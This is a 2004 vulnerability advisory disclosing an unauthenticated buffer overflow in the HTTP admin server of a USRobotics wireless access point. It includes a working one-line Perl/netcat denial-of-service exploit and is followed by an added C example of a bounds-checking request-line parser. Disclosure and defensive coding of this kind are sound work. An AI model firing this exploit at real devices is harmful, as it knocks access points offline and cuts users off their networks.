------------------------------------------------------------------
 7a69ezine Advisories                                 7a69Adv#13
------------------------------------------------------------------
 http://www.7a69ezine.org                            [02/08/2004]
------------------------------------------------------------------

Title:        USRobotics AP Wireless Denial of Service
Author:       Albert Puigsech Galicia - <ripe@xxxxxxxxxxxxx>
Software:     Embedded HTTP server
Versions:     1.21h
Remote:       yes
Exploit:      yes
Severity:     High

------------------------------------------------------------------

I. Introduction

USRobotics is an important company that builds many network devices, such as modems, wireless cards and wireless access points. It also builds robots (as you can see in the film "I, Robot"). For more information about the company, visit the official website at http://www.usrobotics.com.

II. Description

The USR808054 wireless access point can be administered over HTTP, so the firmware includes a small HTTP server. The latest version of this server has a critical buffer overflow that allows malicious users on the network to cause a denial of service or execute arbitrary code.

III. Exploit

The buffer overflow is in the handling of the HTTP version string of a GET request. The request does not require the administrator password, so any user on the network who is allowed to connect to the HTTP port (everyone, by default) can exploit this issue. This is exploit code using perl:

    bash ~ $ perl -e '$a = "GET / " . "A"x250 . "\r\n\r\n" ; print $a' | nc ap 80

It crashes the access point and disconnects all wireless users from the network. It may also be possible (with knowledge of the architecture used by USRobotics) to exploit the vulnerability to execute arbitrary code and take full control of the device.

IV. Patch

Not yet.

V. Timeline

19/07/2004 - Notified to spain_modemsupport@xxxxxxx - No reply

VI. Extra data

I have only tested this vulnerability on my USR808054, but other USR products may also be affected.

--
-----------------------------------------------------------------------
Albert Puigsech Galicia
http://www.7a69ezine.org/~apuigsech
-----------------------------------------------------------------------
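
The overflow in section III is triggered by an over-long HTTP version token in the request line. The C code below is an added example, not code from the advisory or from the USRobotics firmware: a request-line parser that rejects such a token instead of copying it into a fixed buffer. The struct, function names and size limits are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed limits for illustration; not taken from the firmware. */
#define METHOD_MAX  8
#define TARGET_MAX  256
#define VERSION_MAX 9   /* "HTTP/1.1" plus NUL */

struct request {
    char method[METHOD_MAX], target[TARGET_MAX], version[VERSION_MAX];
};

/* Copy the next space/CR/LF-delimited token at *p into dst (cap bytes incl. NUL).
 * Returns 0 on success, -1 if the token is empty or does not fit. */
static int take_token(const char **p, char *dst, size_t cap)
{
    size_t n = strcspn(*p, " \r\n");
    if (n == 0 || n >= cap)
        return -1;      /* reject; never truncate or write past dst */
    memcpy(dst, *p, n);
    dst[n] = '\0';
    *p += n;
    return 0;
}

/* Parse "METHOD SP target SP HTTP/1.x CRLF". Returns 0 if well formed,
 * -1 otherwise (the caller would answer 400 and close the connection). */
int parse_request_line(const char *line, struct request *req)
{
    const char *p = line;
    if (take_token(&p, req->method, sizeof req->method) || *p++ != ' ')
        return -1;
    if (take_token(&p, req->target, sizeof req->target) || *p++ != ' ')
        return -1;
    if (take_token(&p, req->version, sizeof req->version))
        return -1;
    if (strcmp(req->version, "HTTP/1.0") && strcmp(req->version, "HTTP/1.1"))
        return -1;
    return strncmp(p, "\r\n", 2) == 0 ? 0 : -1;
}

int main(void)
{
    struct request r;
    char bad[300] = "GET / ";   /* constructed: 250-byte version token */
    memset(bad + 6, 'A', 250);
    strcpy(bad + 256, "\r\n\r\n");
    printf("normal: %d, overlong version: %d\n",
           parse_request_line("GET / HTTP/1.1\r\n\r\n", &r), parse_request_line(bad, &r));
    return 0;
}
```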